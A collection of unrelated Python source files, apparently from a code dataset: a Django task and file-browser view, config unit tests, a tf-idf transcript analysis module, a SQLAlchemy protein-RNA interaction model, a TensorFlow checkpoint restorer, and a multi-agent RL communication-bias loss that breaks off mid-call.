qty = self.get_view_qty(fix_group, _nav_item)
active = (self.config.cur_view_group.determinator == determinator) and (self.config.cur_view_group.view_id == view_id)
fix = {
'determinator': determinator,
'id': view_id,
'url': url,
'icon': value['icon'],
'title': _(value['title']).capitalize(),
'qty': qty,
'active': active,
'search_qty': search_qty,
}
fixes.append(fix)
return fixes
def get_view_qty(self, group, nav_item):
data = self.get_dataset(group, nav_item=nav_item)
return len(data)
def get_dataset(self, group, query=None, nav_item=None):
if (group.determinator == 'role'):
cur_role = group.view_id
else:
cur_role = self.config.base_role
data = Task.get_role_tasks(self.request.user.id, self.config.app, cur_role, nav_item)
if (self.config.app == APP_ALL) and (not query):
return data
if data and ((not group.determinator) or (group.determinator == 'group')):
data = data.filter(groups__id=group.id)
# if (not group.completed):
# data = data.filter(completed=False)
if hasattr(self, 'tune_dataset'):
return self.tune_dataset(data, group)
return data
def get_nav_items(self):
nav_role = Task.get_nav_role(self.config.app)
if (not nav_role) or (nav_role == self.config.cur_view_group.view_id):
return None
href = self.request.path
if ('pk' in self.kwargs):
pk = str(self.kwargs['pk']) + '/'
if (pk in href):
href = href.split(pk)[0]
sort = 'name'
nav_item_group = detect_group(self.request.user, self.config.app, 'role', nav_role, '')
if nav_item_group and nav_item_group.items_sort:
sort = nav_item_group.items_sort
ret = []
for item in Task.get_role_tasks(self.request.user.id, self.config.app, nav_role).order_by(sort):
ret.append({
'id': item.id,
'name': item.name,
'qty': len(Task.get_role_tasks(self.request.user.id, self.config.app, self.config.cur_view_group.view_id, item)),
'href': href,
})
return ret
class DirContext(Context):
def get_context_data(self, **kwargs):
self.config.set_view(self.request)
self.object = None
self.cur_folder = ''
page_title = ''
title = ''
if ('folder' in self.request.GET):
self.cur_folder = self.request.GET['folder']
page_title = self.cur_folder.split('/')[-1:][0]
title = self.cur_folder
if not self.cur_folder:
page_title = _(self.config.app_title)
title = page_title
kwargs.update({'title': page_title})
dir_tree = []
self.scan_dir_tree(dir_tree, self.cur_folder, self.store_dir.rstrip('/'))
self.scan_files()
self.object = None
context = super().get_context_data(**kwargs)
upd_context = self.get_app_context(self.request.user.id, None, icon=self.config.view_icon, nav_items=None, **kwargs)
context.update(upd_context)
context['title'] = title
context['dir_tree'] = dir_tree
context['file_list'] = self.file_list
context['gps_data'] = self.gps_data
if (self.config.cur_view_group.determinator == 'view') and (self.config.cur_view_group.view_id != self.config.main_view):
context['cur_view'] = self.config.cur_view_group.view_id
context['theme_id'] = 24
context['cur_folder'] = self.cur_folder
return context
def scan_dir_tree(self, dir_tree, cur_folder, path, parent=None, demo=False):
ld = glob.glob(path + '/*/')
if not len(ld):
return
node = ''
level = 0
if parent:
node = parent['node']
if node:
node += '/'
node += parent['name']
level = parent['level'] + 1
s_node = node
if node:
s_node = node + '/'
p = path
for d in ld:
dd = d.replace('\\', '/')
name = dd.split(p)[1].strip('/')
x = {
'node': node,
'name': name,
'active': (cur_folder == s_node + name),
'level': level,
'qty': 0,
}
dir_tree.append(x)
if not demo:
self.scan_dir_tree(dir_tree, cur_folder, path + '/' + name, x)
def scan_files(self):
self.gps_data = []
self.file_list = []
with os.scandir(self.store_dir + self.cur_folder) as it:
for entry in it:
if (entry.name.upper() == 'Thumbs.db'.upper()):
continue
if entry.is_dir():
continue
ff = self.store_dir + self.cur_folder + '/' + entry.name
mt = mimetypes.guess_type(ff)
file_type = ''
if mt and mt[0]:
file_type = mt[0]
self.file_list.append({
'name': entry.name,
'href': 'file/?folder=' + self.cur_folder + '&file=' + entry.name,
'date': time.ctime(os.path.getmtime(ff)),
'type': file_type,
'size': self.sizeof_fmt(os.path.getsize(ff)),
})
return self.gps_data
def sizeof_fmt(self, num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return f'{num:3.1f}{unit}{suffix}'
num /= 1024.0
return f'{num:.1f}Yi{suffix}'
| StarcoderdataPython |
3261873 | import mock
import testtools
from shakenfist import config
from shakenfist import exceptions
class ConfigTestCase(testtools.TestCase):
@mock.patch('socket.getfqdn', return_value='a.b.com')
@mock.patch('socket.gethostbyname', return_value='1.1.1.1')
def test_hostname(self, mock_hostname, mock_fqdn):
config.parsed.parse()
mock_fqdn.assert_called()
mock_hostname.assert_called()
self.assertEqual('a.b.com', config.parsed.get('NODE_NAME'))
self.assertEqual('1.1.1.1', config.parsed.get('NODE_IP'))
@mock.patch.dict('os.environ', {'SHAKENFIST_STORAGE_PATH': 'foo'})
def test_string_override(self):
config.parsed.parse()
self.assertTrue(isinstance(config.parsed.get('STORAGE_PATH'), str))
self.assertEqual('foo', config.parsed.get('STORAGE_PATH'))
@mock.patch.dict('os.environ', {'SHAKENFIST_CPU_OVERCOMMIT_RATIO': '1'})
def test_int_override(self):
config.parsed.parse()
self.assertTrue(isinstance(
config.parsed.get('CPU_OVERCOMMIT_RATIO'), int))
self.assertEqual(1, config.parsed.get('CPU_OVERCOMMIT_RATIO'))
@mock.patch.dict('os.environ', {'SHAKENFIST_RAM_SYSTEM_RESERVATION': '4.0'})
def test_float_override(self):
config.parsed.parse()
self.assertTrue(isinstance(config.parsed.get(
'RAM_SYSTEM_RESERVATION'), float))
self.assertEqual(4.0, config.parsed.get('RAM_SYSTEM_RESERVATION'))
@mock.patch.dict('os.environ', {'SHAKENFIST_RAM_SYSTEM_RESERVATION': 'banana'})
def test_bogus_override(self):
self.assertRaises(ValueError, config.parsed.parse)
@mock.patch.dict('shakenfist.config.CONFIG_DEFAULTS', {'FOO': [1, 2, 3]})
@mock.patch.dict('os.environ', {'SHAKENFIST_FOO': '[1, 4, 6]'})
def test_bogus_default(self):
self.assertRaises(exceptions.FlagException, config.parsed.parse)
| StarcoderdataPython |
3327797 | import gensim.downloader
import numpy as np
from gensim.corpora import Dictionary
from gensim.models import TfidfModel
from argparse import ArgumentParser
from logging import Logger
from pathlib import Path
from typing import List
from speechless.edit_context.common import TimelineChange
from speechless.processing.analysis.analysis import (ARG_PREPARE_METHOD_FN, AnalysisDomain,
AnalysisMethod, analysis_method_cli)
from speechless.processing.tokenization import (EditToken, make_timeline_changes,
sentence_segmentation, spacy_nlp)
from speechless.readers.subtitles import read_subtitles
from speechless.readers import read_entire_audio
from speechless.transcription import speech_to_text
from speechless.utils.logging import NULL_LOGGER
from speechless.utils.storage import make_cache_dir_rel
GENSIM_CACHE_DIR = make_cache_dir_rel('gensim')
CORPUS_DIR = str(GENSIM_CACHE_DIR / 'gensim-data/')
DICTIONARY_FILE = str(GENSIM_CACHE_DIR / 'tfidf_dictionary.dic')
MODEL_FILE = str(GENSIM_CACHE_DIR / 'tfidf_model.model')
class TfidfAnalysis(AnalysisMethod):
def __init__(self,
corpus: str,
sent_th_ratio: float,
remove_sw: bool,
lemmatize: bool,
logger: Logger = NULL_LOGGER) -> None:
super().__init__('Tf-idf Analysis', [AnalysisDomain.TEXT], logger)
self.sent_th_ratio = sent_th_ratio
self.remove_sw = remove_sw
self.lemmatize = lemmatize
gensim.downloader.BASE_DIR = CORPUS_DIR
gensim.downloader.base_dir = CORPUS_DIR
if Path(DICTIONARY_FILE).exists() and Path(MODEL_FILE).exists():
self.data_dict = Dictionary.load(DICTIONARY_FILE)
self.model = TfidfModel.load(MODEL_FILE)
else:
data = gensim.downloader.load(corpus)
self.data_dict = Dictionary(data)
self.data_dict.save(DICTIONARY_FILE)
corpus = [self.data_dict.doc2bow(line) for line in data]
self.model = TfidfModel(corpus)
self.model.save(MODEL_FILE)
def analyze(self, recording_path: str, subtitles_path: str) -> List[TimelineChange]:
if subtitles_path is None:
audio, _ = read_entire_audio(recording_path,
aud_format='s16le',
sample_rate=16000,
logger=self.logger)
transcript = speech_to_text(audio[0] if len(audio.shape) > 1 else audio)
else:
transcript = read_subtitles(subtitles_path)
sentences = sentence_segmentation(transcript)
tokens = self.set_labels(sentences)
return make_timeline_changes(tokens)
def set_labels(self, sentences: List[List[EditToken]]) -> List[EditToken]:
spacy_pipes = ['tagger', 'attribute_ruler'] + (['lemmatizer'] if self.lemmatize else [])
doc_text = ''.join([token.text for sentence in sentences for token in sentence])
doc_tokens = spacy_nlp(doc_text, spacy_pipes)
doc_tokens = [token for token in doc_tokens if not token.is_punct]
if self.remove_sw:
doc_tokens = [token for token in doc_tokens if not token.is_stop]
if self.lemmatize:
tfidf_doc = [token.lemma_ for token in doc_tokens]
else:
tfidf_doc = [token.norm_ for token in doc_tokens]
sent_scores = [[] for _ in range(len(sentences))]
if len(tfidf_doc) > 0:
bow = self.data_dict.doc2bow(tfidf_doc,)
doc_scores = self.model[bow]
doc_scores = {self.data_dict[key]: score for key, score in doc_scores}
sent_idx = -1
sent_start, sent_end = 0, 0
for token_idx, token in enumerate(doc_tokens):
while sent_idx + 1 < len(sentences) and not (sent_start <= token.idx < sent_end):
sent_idx += 1
first_sent_token = sentences[sent_idx][0]
last_sent_token = sentences[sent_idx][-1]
sent_start = first_sent_token.start_pos
sent_end = last_sent_token.start_pos + len(last_sent_token)
if sent_idx >= len(sentences):
break
sent_scores[sent_idx].append(doc_scores.get(tfidf_doc[token_idx], 0.0))
sent_scores = np.array([np.mean(s_sc) if len(s_sc) > 0 else 0 for s_sc in sent_scores])
sent_scores = (sent_scores >= self.sent_th_ratio * np.mean(sent_scores)).astype(float)
for sent_idx, sentence in enumerate(sentences):
for t in sentence:
t.label = sent_scores[sent_idx]
return [token for s in sentences for token in s]
def score_transcription(self, transcript: List[EditToken]) -> List[float]:
sentences = sentence_segmentation(transcript)
tokens = self.set_labels(sentences)
changes = [token.label for token in tokens]
return changes
############################################### CLI ################################################
@analysis_method_cli
class CLI:
COMMAND = 'tfidf'
DESCRIPTION = 'Tf-idf analysis'
ARG_CORPUS = 'corpus'
ARG_SENT_TH_RATIO = 'sent_th_ratio'
ARG_REMOVE_SW = 'remove_sw'
ARG_LEMMATIZE = 'lemmatize'
DEFAULT_ARGS = {
ARG_CORPUS: 'text8',
ARG_SENT_TH_RATIO: 1.0,
ARG_REMOVE_SW: False,
ARG_LEMMATIZE: False
}
@staticmethod
def prepare_method(args, logger: Logger) -> 'TfidfAnalysis':
return TfidfAnalysis(args.get(CLI.ARG_CORPUS, CLI.DEFAULT_ARGS[CLI.ARG_CORPUS]),
args.get(CLI.ARG_SENT_TH_RATIO, CLI.DEFAULT_ARGS[CLI.ARG_SENT_TH_RATIO]),
args.get(CLI.ARG_REMOVE_SW, CLI.DEFAULT_ARGS[CLI.ARG_REMOVE_SW]),
args.get(CLI.ARG_LEMMATIZE, CLI.DEFAULT_ARGS[CLI.ARG_LEMMATIZE]),
logger=logger)
@staticmethod
def setup_arg_parser(parser: ArgumentParser) -> ArgumentParser:
"""Sets up a CLI argument parser for this submodule
Returns:
ArgumentParser: Configured parser
"""
parser.add_argument('-c',
f'--{CLI.ARG_CORPUS}',
help='Corpus from gensim',
type=str,
action='store',
default=CLI.DEFAULT_ARGS[CLI.ARG_CORPUS])
parser.add_argument('-tr',
f'--{CLI.ARG_SENT_TH_RATIO}',
help='Sentence threshold ratio. Sentences with a score lower than \
`mean sentence score`*`ratio` will be removed from the recording',
type=float,
action='store',
default=CLI.DEFAULT_ARGS[CLI.ARG_SENT_TH_RATIO])
parser.add_argument('-rsw',
f'--{CLI.ARG_REMOVE_SW}',
help='Remove stopwords',
action='store_true',
default=CLI.DEFAULT_ARGS[CLI.ARG_REMOVE_SW])
parser.add_argument('-l',
f'--{CLI.ARG_LEMMATIZE}',
help='Use lemmatization',
action='store_true',
default=CLI.DEFAULT_ARGS[CLI.ARG_LEMMATIZE])
parser.set_defaults(**{ARG_PREPARE_METHOD_FN: CLI.prepare_method})
| StarcoderdataPython |
3379303 |
import re
from sqlalchemy import or_,and_
from sqlalchemy import Column, String, Integer, Boolean, Float, ForeignKey,PrimaryKeyConstraint
from sqlalchemy.orm import relationship
from fr.tagc.rainet.core.util.sql.Base import Base
from fr.tagc.rainet.core.util.sql.SQLManager import SQLManager
from fr.tagc.rainet.core.util.exception.RainetException import RainetException
from fr.tagc.rainet.core.util.log.Logger import Logger
from fr.tagc.rainet.core.data import DataConstants
from fr.tagc.rainet.core.util.pattern.PatternUtil import PatternUtil
from fr.tagc.rainet.core.util.sql.SQLUtil import SQLUtil
from fr.tagc.rainet.core.data.ProteinCrossReference import ProteinCrossReference
from fr.tagc.rainet.core.data.RNA import RNA
from fr.tagc.rainet.core.data.Protein import Protein
from fr.tagc.rainet.core.util.exception.NotRequiredInstantiationException import NotRequiredInstantiationException
from sqlalchemy.orm.base import instance_dict
from fr.tagc.rainet.core.util.time.Timer import Timer
import sys
# #
# This class describes a Protein-RNA interactions predicted by CatRAPID software.
#
class ProteinRNAInteractionCatRAPID( Base ):
__tablename__ = 'ProteinRNAInteractionCatRAPID'
# The RNA transcript ID, Ensembl ENST
transcriptID = Column( String, ForeignKey( 'RNA.transcriptID'), primary_key=True)
# The Protein Uniprot_ac ID
proteinID = Column( String, ForeignKey( 'Protein.uniprotAC'), primary_key=True)
# The interaction score / interaction propensity from catRAPID prediction
interactionScore = Column( Float )
proteins = relationship( "Protein" )
# #
# The ProteinRNAInteractionCatRAPID constructor.
#
# @param interactors: the interacting protein-RNA pair
# @param interaction_score: the interaction score
#
def __init__( self, interactors, interaction_score):
from fr.tagc.rainet.core.util.data.DataManager import DataManager
dt_manager = DataManager.get_instance()
#=======================================================================
# Parse interactors
#
# Example
# sp|Q96DC8|ECHD3_HUMAN ENST00000579524 -12.33 0.10 0.00
# sp|P10645|CMGA_HUMAN ENST00000516610 10.66 0.32 0.00
# protein and rna separated by " ", other values separated by "\t"
#
# Protein is always on left side, RNA in the right side.
# Assumption that there only one interaction between each Protein-RNA pair
#=======================================================================
spl = interactors.split(" ")
if len(spl) == 2:
protein_id = spl[0].split( "|")[1]
transcript_id = spl[1].split( "\t")[0]
else:
raise RainetException( "ProteinRNAInteractionCatRAPID.__init__ : The interactor string could not be parsed: " + str( interactors ))
#=======================================================================
# Fill variables
#=======================================================================
try:
self.interactionScore = float( interaction_score)
except ValueError as ve:
raise RainetException( "ProteinRNAInteractionCatRAPID.__init__ : The value of interaction score is not a float: " + str( interaction_score ), ve )
#=======================================================================
# Query Protein object
# See if Protein with given protein_id exists in database
#=======================================================================
protein_list = dt_manager.get_data( DataConstants.PROT_ALL_KW)
if protein_id in protein_list:
self.proteinID = protein_id
else:
# raise RainetException( "ProteinRNAInteractionCatRAPID.init : No Protein object while using cross references for protein_id = " + protein_id)
Logger.get_instance().warning( "\nProteinRNAInteractionCatRAPID.init : Protein ID not found, will skip interaction:\t" + str( protein_id) )
# Store missing Protein ID in a list
dt_manager.data[ DataConstants.PROTEIN_RNA_INTERACTION_CATRAPID_MISSING_PROT_KW].append( protein_id)
raise NotRequiredInstantiationException( "ProteinRNAInteractionCatRAPID.init : No Protein found, instance will not be created.")
#=======================================================================
# Query RNA object
# See if RNA with given transcript_id exists in database
#=======================================================================
RNA_list = dt_manager.get_data( DataConstants.RNA_ALL_KW)
if transcript_id in RNA_list:
self.transcriptID = transcript_id
else:
# raise RainetException( "ProteinRNAInteractionCatRAPID.init : No RNA object found for transcript_id = " + transcript_id)
Logger.get_instance().warning( "\nProteinRNAInteractionCatRAPID.init : RNA ID not found, will skip interaction:\t" + str( transcript_id) )
# Store missing RNA ID in a list
dt_manager.data[ DataConstants.PROTEIN_RNA_INTERACTION_CATRAPID_MISSING_RNA_KW].append( transcript_id)
raise NotRequiredInstantiationException( "ProteinRNAInteractionCatRAPID.init: No RNA found, instance will not be created." )
##
# Add the object to SQLAlchemy session if it is linked to a protein and RNA
def add_to_session(self):
sql_session = SQLManager.get_instance().get_session()
sql_session.add( self)
| StarcoderdataPython |
3358693 | import os
import tensorflow as tf
from tensorkit.log import logger, Color
class Restore(object):
def __init__(self):
self._var_list = None
self._restore_saver = None
self._restore_optimistic = False
self.restore_ckpt_file = None
self._inited = False
def init(self, var_list=None, ckpt_dir=None, ckpt_file=None, optimistic=False):
"""
:param var_list: vars for restore
:param ckpt_dir: prefix of model files.
:param ckpt_file: exact name of model file, priority is higher than `ckpt_dir`
:param optimistic: only restore weights of same names with model.
:return:
"""
assert (var_list is None) or (len(var_list) > 0), 'invalid var_list: {}'.format(var_list)
assert ckpt_dir is not None or ckpt_file is not None, 'ckpt_dir and ckpt_file are both None'
self._var_list = var_list
self._restore_optimistic = optimistic
if ckpt_file is None:
assert os.path.exists(ckpt_dir), 'invalid checkpoint dir: %s' % ckpt_dir
# get ckpt file.
self.restore_ckpt_file = tf.train.latest_checkpoint(os.path.dirname(ckpt_dir + os.sep))
else:
self.restore_ckpt_file = ckpt_file
self._inited = True
return self
def restore(self, sess):
assert self._inited, 'make sure init() before restore()'
if self._restore_vars(sess):
logger.info('- succeed restore variables from: {}'.format(self.restore_ckpt_file))
return True
return False
def _restore_vars(self, sess):
"""
:param sess:
:return: boolean for successful or not
"""
if not self._restore_optimistic:
if self.restore_ckpt_file is None:
logger.warn(
Color.yellow('No checkpoint file for restore vars, checkpoint file is None', bold=True))
return False
self._restore_saver = tf.train.Saver(self._var_list, name='tk_restore')
self._restore_saver.restore(sess, self.restore_ckpt_file)
return True
else:
return self._optimistic_restore_model(sess)
def _optimistic_restore_model(self, sess):
"""
restore weights of same names with model.
:param sess:
:return:
"""
if self.restore_ckpt_file is None:
logger.warn(Color.yellow('No ckpt file for restore vars, ckpt file is None'))
return False
reader = tf.train.NewCheckpointReader(self.restore_ckpt_file)
saved_shapes = reader.get_variable_to_shape_map()
if self._var_list is None:
restore_key2vars = {var.name.split(':')[0]: var for var in tf.global_variables()}
elif isinstance(self._var_list, list):
restore_key2vars = {var.name.split(':')[0]: var for var in self._var_list}
elif isinstance(self._var_list, dict):
restore_key2vars = self._var_list
else:
raise RuntimeError('type error {}'.format(self._var_list))
assert len(restore_key2vars) > 0
restore_key2vars = sorted([(k, v) for k, v in restore_key2vars.items() if k in saved_shapes])
msg = []
var_list = dict()
with tf.variable_scope('', reuse=True):
for key, var in restore_key2vars:
var_shape = var.get_shape().as_list()
if var_shape == saved_shapes[key]:
var_list[key] = var
var_name = var.name[:var.name.index(':')]
msg.append('- restoring variable: {}'.format(var_name)
if var_name == key else
'- restoring variable {} from {}'.format(var_name, key))
else:
msg.append(Color.yellow(
'- variable({}) with inconsistent shape: {}(graph) != {}(ckpt)'.format(
key, var_shape, saved_shapes[key])
))
if len(var_list) != 0:
msg += ['- total variable count: {}'.format(len(var_list))]
logger.info('\n'.join(msg))
saver = tf.train.Saver(var_list, name='tk_restore')
saver.restore(sess, self.restore_ckpt_file)
return True
else:
logger.warn(Color.yellow('No vars need to restore from file: {}'.format(self.restore_ckpt_file)))
return False
def __str__(self):
content = 'RESTORE_OPTIMISTIC: %s' \
'\nRESTORE_CHECKPOINT_FILE: %s' % (self._restore_optimistic, self.restore_ckpt_file)
return content
| StarcoderdataPython |
1724031 | """
Implementation of Eccles, Tom, et al. "Biases for Emergent Communication in Multi-agent
Reinforcement Learning." Advances in Neural Information Processing Systems. 2019.
"""
import gym
import numpy as np
from ray.rllib import SampleBatch
from ray.rllib.agents.impala import vtrace
from ray.rllib.agents.impala.vtrace_policy import _make_time_major, BEHAVIOUR_LOGITS
from ray.rllib.models import ModelCatalog
from ray.rllib.models.tf.tf_action_dist import MultiActionDistribution, Categorical
from ray.rllib.policy.policy import ACTION_LOGP
from ray.rllib.utils import try_import_tf
from ray.rllib.utils.tuple_actions import TupleActions
from .impala_cpc_sa import WASTED_ACTS, CpcVTracePolicy
from ..utils.model_utils import CPCLayer
tf = try_import_tf()
NO_MESSAGE_OBS = "no_message_obs"
class MessageActionDistribution(MultiActionDistribution):
"""Distribution for (action, message) tuple"""
def __init__(self, inputs, model, action_space, name):
child_dist = []
input_lens = []
for action in action_space.spaces:
dist, action_size = ModelCatalog.get_action_dist(action, {})
child_dist.append(dist)
input_lens.append(action_size)
super().__init__(inputs, model, action_space, child_dist, input_lens)
with tf.variable_scope(name):
self.entropy_list = [s.entropy() for s in self.child_distributions]
@staticmethod
def required_model_output_shape(action_space, model_config):
input_lens = []
for action in action_space.spaces:
dist, action_size = ModelCatalog.get_action_dist(action, {})
input_lens.append(action_size)
return sum(input_lens)
def entropy(self):
return self.entropy_list[0]
def message_entropy(self):
return self.entropy_list[-1]
def mean_message_entropy(self):
"""Entropy of the mean message policy"""
p_average = self.mean_message_p()
logp_average = tf.log(p_average)
return -tf.reduce_sum(p_average * logp_average)
def mean_message_p(self):
message_dist = self.child_distributions[-1]
message_logits = message_dist.inputs
p_bt = tf.nn.softmax(message_logits)
p_average = tf.reduce_mean(p_bt, axis=0)
return p_average
def action_p(self):
action_dist = self.child_distributions[0]
action_logits = action_dist.inputs
return tf.nn.softmax(action_logits)
def action_logits(self):
return self.child_distributions[0].inputs
class DeterministicMessageActionDistribution(MessageActionDistribution):
"""Distribution for (stochastic action, deterministic message) tuple"""
def sample(self):
return TupleActions(
[
self.child_distributions[0].sample(),
self.child_distributions[1].deterministic_sample(),
]
)
def logp(self, x):
split_indices = []
for dist in self.child_distributions:
if isinstance(dist, Categorical):
split_indices.append(1)
else:
split_indices.append(tf.shape(dist.sample())[1])
split_list = tf.split(x, split_indices, axis=1)
for i, distribution in enumerate(self.child_distributions):
# Remove extra categorical dimension
if isinstance(distribution, Categorical):
split_list[i] = tf.cast(tf.squeeze(split_list[i], axis=-1), tf.int32)
log_action = self.child_distributions[0].logp(split_list[0])
all_message_p = tf.nn.softmax(self.child_distributions[1].inputs)
indices = tf.stack([tf.range(tf.shape(all_message_p)[0]), split_list[1]], axis=1)
message_p = tf.gather_nd(all_message_p, indices)
return log_action + message_p
class CommBiasLoss:
def __init__(
self,
actions,
actions_logp,
actions_entropy,
message_entropy,
dones,
behaviour_action_logp,
behaviour_logits,
target_logits,
discount,
rewards,
values,
bootstrap_value,
dist_class,
model,
valid_mask,
config,
vf_loss_coeff=0.5,
entropy_coeff=0.01,
message_entropy_coeff=0.0,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
use_cpc=True,
cpc_ins=None,
cpc_preds=None,
cpc_coeff=10.0,
use_sender_bias=False,
l_ps_lambda=3.0,
entropy_target=1.0,
average_message_entropy=None,
sender_bias_coeff=0.1,
use_receiver_bias=False,
l_ce_coeff=0.001,
l_pl_coeff=0.01,
message_p=None,
no_message_p=None,
**kwargs,
):
"""
See VTraceLoss class
Args:
use_cpc: True if CPC loss should be added
cpc_ins: Input encodings of CPC (Shape: [T, B, code_size]
cpc_preds: Output encodings of CPC(Shape: [T, B, length, code_size]
cpc_coeff: Coefficient for CPC loss
use_sender_bias: True if sender bias loss should be added
l_ps_lambda:
"""
# Compute vtrace on the CPU for better perf.
with tf.device("/cpu:0"):
self.vtrace_returns = vtrace.multi_from_logits(
behaviour_action_log_probs=behaviour_action_logp,
behaviour_policy_logits=behaviour_logits,
target_policy_logits=target_logits,
actions=tf.unstack(actions, axis=2),
discounts=tf.to_float(~dones) * discount,
rewards=rewards,
values=values,
bootstrap_value=bootstrap_value,
dist_class=dist_class,
model=model,
clip_rho_threshold=tf.cast(clip_rho_threshold, tf.float32),
clip_pg_rho_threshold=tf.cast(clip_pg_rho_threshold, tf.float32),
)
self.value_targets = self.vtrace_returns.vs
# The policy gradients loss
self.pi_loss = -tf.reduce_sum(
tf.boolean_mask(actions_logp * self.vtrace_returns.pg_advantages, valid_mask)
)
# The baseline loss
delta = tf.boolean_mask(values - self.vtrace_returns.vs, valid_mask)
self.vf_loss = 0.5 * tf.reduce_sum(tf.square(delta))
# The entropy loss
self.entropy = tf.reduce_sum(tf.boolean_mask(actions_entropy, valid_mask))
self.message_entropy = tf.reduce_sum(tf.boolean_mask(message_entropy, valid_mask))
# The summed weighted loss
self.total_loss = (
self.pi_loss
+ self.vf_loss * vf_loss_coeff
- self.entropy * entropy_coeff
- self.message_entropy * message_entropy_coeff
)
if use_cpc:
# CPC loss
with tf.variable_scope("cpc_loss"):
losses = []
cpc_length = cpc_preds.shape.as_list()[2]
T = tf.shape(cpc_preds)[0]
# Scaling coeff to take mean over k
scaling_coeff = tf.cast(
tf.reverse(tf.minimum(tf.range(1, T - 1 + 1), cpc_length), axis=[0]),
dtype=tf.float32,
)
for k in range(1, cpc_length + 1):
loss = CPCLayer(k, name=f"cpc_{k}")([cpc_ins, cpc_preds[:, :, k - 1]])
losses.append(tf.reduce_sum(loss / scaling_coeff[: T - k]))
self.cpc_loss = tf.reduce_sum(tf.stack(losses), name=f"cpc_loss")
self.total_loss += self.cpc_loss * cpc_coeff
else:
self.cpc_loss = tf.constant(np.nan)
if use_sender_bias:
# Sender bias loss
with tf.variable_scope("sender_bias"):
self.average_message_entropy = average_message_entropy
self.sender_bias_loss = (
tf.reduce_sum(l_ps_lambda * (message_entropy - entropy_target) ** 2)
- average_message_entropy
)
self.total_loss += self.sender_bias_loss * sender_bias_coeff
else:
self.average_message_entropy = tf.constant(np.nan)
self.sender_bias_loss = tf.constant(np.nan)
if use_receiver_bias:
# Receiver bias loss
with tf.variable_scope("receiver_bias"):
self.l_ce = -tf.reduce_sum(
tf.stop_gradient(message_p) * tf.log(no_message_p)
)
self.l_pl = tf.reduce_sum(
tf.abs(message_p - tf.stop_gradient(no_message_p))
)
self.total_loss += self.l_ce * l_ce_coeff - self.l_pl * l_pl_coeff
else:
self.l_ce = tf.constant(np.nan)
self.l_pl = tf.constant(np.nan)
def build_ma_comm_loss(policy, model, dist_class, train_batch):
"""
Copied from build_vtrace_loss. Adds CPC loss, comm biases and/or modifications for
inference based messaging
"""
def make_time_major(*args, **kw):
return _make_time_major(policy, train_batch.get("seq_lens"), *args, **kw)
actions = train_batch[SampleBatch.ACTIONS]
dones = make_time_major(train_batch[SampleBatch.DONES], drop_last=False)
rewards = make_time_major(train_batch[SampleBatch.REWARDS], drop_last=False)
completed = tf.to_float(~dones)[-1]
next_train_batch = {
SampleBatch.CUR_OBS: make_time_major(train_batch[SampleBatch.NEXT_OBS])[-1],
SampleBatch.PREV_ACTIONS: make_time_major(train_batch[SampleBatch.ACTIONS])[-1],
SampleBatch.PREV_REWARDS: make_time_major(train_batch[SampleBatch.REWARDS])[-1],
"seq_lens": tf.ones_like(train_batch["seq_lens"]),
}
i = 0
while f"state_out_{i}" in train_batch:
next_train_batch[f"state_in_{i}"] = make_time_major(
train_batch[f"state_out_{i}"]
)[-1]
i += 1
next_model_out, _ = model.from_batch(next_train_batch)
next_values = model.value_function()
bootstrap_value = tf.multiply(next_values, completed, name="bootstrap_value")
model_out, _ = model.from_batch(train_batch)
action_dist = dist_class(model_out, model)
if isinstance(policy.action_space, gym.spaces.Discrete):
is_multidiscrete = False
output_hidden_shape = [policy.action_space.n]
elif isinstance(policy.action_space, gym.spaces.multi_discrete.MultiDiscrete):
is_multidiscrete = True
output_hidden_shape = policy.action_space.nvec.astype(np.int32)
else:
is_multidiscrete = False
output_hidden_shape = 1
behaviour_action_logp = make_time_major(train_batch[ACTION_LOGP], drop_last=False)
behaviour_logits = train_batch[BEHAVIOUR_LOGITS]
unpacked_behaviour_logits = tf.split(behaviour_logits, output_hidden_shape, axis=1)
unpacked_outputs = tf.split(model_out, output_hidden_shape, axis=1)
values = model.value_function()
if policy.is_recurrent():
max_seq_len = tf.reduce_max(train_batch["seq_lens"]) - 1
mask = tf.sequence_mask(train_batch["seq_lens"], max_seq_len)
mask = tf.reshape(mask, [-1])
else:
mask = tf.ones_like(rewards)
# Prepare actions for loss
loss_actions = actions if is_multidiscrete else tf.expand_dims(actions, axis=1)
custom_opts = policy.config["model"]["custom_options"]
use_cpc = custom_opts["use_cpc"]
if use_cpc:
cpc_ins = model.cpc_ins()
cpc_preds = model.cpc_preds()
cpc_config = custom_opts["cpc_opts"]
cpc_config.update(
dict(cpc_ins=make_time_major(cpc_ins), cpc_preds=make_time_major(cpc_preds))
)
else:
cpc_config = {}
use_sender_bias = custom_opts["use_sender_bias"]
if use_sender_bias:
size = tf.cast(tf.shape(actions)[0], tf.float32)
sender_bias_config = custom_opts["sender_bias_opts"]
sender_bias_config.update(
{"average_message_entropy": action_dist.mean_message_entropy() * size}
)
else:
sender_bias_config = {}
use_receiver_bias = custom_opts["use_receiver_bias"]
if use_receiver_bias:
no_message_model_out = model.no_message_out()
no_message_action_dist = dist_class(no_message_model_out, model)
receiver_bias_config = dict(
message_p=action_dist.action_p(),
no_message_p=no_message_action_dist.action_p(),
**custom_opts["receiver_bias_opts"],
)
else:
receiver_bias_config = {}
use_inference_policy = custom_opts["use_inference_policy"]
if use_inference_policy:
if custom_opts["inference_policy_opts"]["type"] == "moving_avg":
# Update the moving average based on the rollout data
# policy._avg_message_state used in build_apply_op() to store the curent
# average for the next rollout
ewma_momentum = custom_opts["inference_policy_opts"]["ewma_momentum"]
unscaled_message_p = model.unscaled_message_p()
policy._avg_message_state = [tf.reduce_mean(unscaled_message_p, axis=0)]
if ewma_momentum is None:
policy._avg_message_state += [
tf.cast(tf.shape(unscaled_message_p)[0], dtype=tf.float32)
]
elif custom_opts["inference_policy_opts"]["type"] == "hyper_nn":
# Find true p(m) for training the p(m) estimator (not used in the paper)
# policy._pm_loss added to other losses (no scaling required since the p(m)
# estimator and policy/value networks are independent
pm_logits = model.pm_logits()
unscaled_message_p = model.unscaled_message_p()
pm_true = tf.reduce_mean(unscaled_message_p, axis=0)
policy._pm_loss = tf.reduce_sum(
tf.nn.softmax_cross_entropy_with_logits(labels=pm_true, logits=pm_logits)
)
else:
raise NotImplementedError("Wrong type for inference_policy")
# Inputs are reshaped from [B * T] => [T - 1, B] for V-trace calc.
policy.loss = CommBiasLoss(
actions=make_time_major(loss_actions, drop_last=False),
actions_logp=make_time_major(action_dist.logp(actions), drop_last=False),
